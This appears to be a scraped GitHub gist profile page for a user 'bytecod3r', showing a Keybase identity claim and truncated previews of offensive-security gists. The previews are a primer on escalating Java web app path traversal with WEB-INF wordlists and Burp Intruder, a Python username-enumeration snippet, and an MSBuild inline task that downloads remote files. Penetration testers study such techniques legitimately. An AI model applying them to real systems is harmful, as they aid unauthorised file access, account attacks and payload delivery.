I hereby claim:
- I am bytecod3r on github.
- I am bytecod3r (https://keybase.io/bytecod3r) on keybase.
- I have a public key ASBR5agAouTH6ETDnlGsETT9L1JtD6Q3erGFzfDPhZSQMgo
To claim this, I am signing this object:
Bytecod3r bytecod3r
bytecod3r
/ exploit_path_traversals_in_Java_webapps.txt
Created
July 9, 2022 16:21
— forked from harisec/exploit_path_traversals_in_Java_webapps.txt
quick primer on how to exploit path traversals in Java web apps (i.e. you can read WEB-INF/web.xml)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| so, you can read WEB-INF/web.xml. how can you escalate this issue? | |
| [step 1]. try to read other common Java files such as WEB-INF/web-jetty.xml. | |
| use a specialized wordlist such as the following (from Sergey Bobrov/BlackFan): | |
| https://github.com/BlackFan/WEB-INF-dict/blob/master/web-inf.txt | |
| with time you can build your own wordlist adding files you've discovered over time. | |
| use Burp Intruder for this, it's perfect for this job. | |
| sort Intruder results by status code so you can see instantly which files were found. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import time | |
| data=['nonexist123','correctUsernameHere.admin','nonexist124','correctUsernameHere.proliant','nonexist125','correctUsernameHere.admin','nonexist125','nonexist126','nonexist127','correctUsernameHere.cjackson','nonexist127','correctUsernameHere.admin','nonexist128','correctUsernameHere.proliant','nonexist129','correctUsernameHere.admin','nonexist130','nonexist131','nonexist132','correctUsernameHere.cjackson'] | |
| headers = {'content-type': 'application/json'} | |
| url='' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <UsingTask TaskName="DownloadFile" TaskFactory="CodeTaskFactory" AssemblyFile="$(MSBuildToolsPath)\Microsoft.Build.Tasks.v4.0.dll"> | |
| <ParameterGroup> | |
| <Address ParameterType="System.String" Required="true" /> | |
| <FileName ParameterType="System.String" Required="true" /> | |
| </ParameterGroup> | |
| <Task> | |
| <Reference Include="System" /> | |
| <Code Type="Fragment" Language="cs"><![CDATA[new System.Net.WebClient().DownloadFile(Address, FileName);]]></Code> |
bytecod3r
/ keybase.md
Created
June 15, 2017 11:20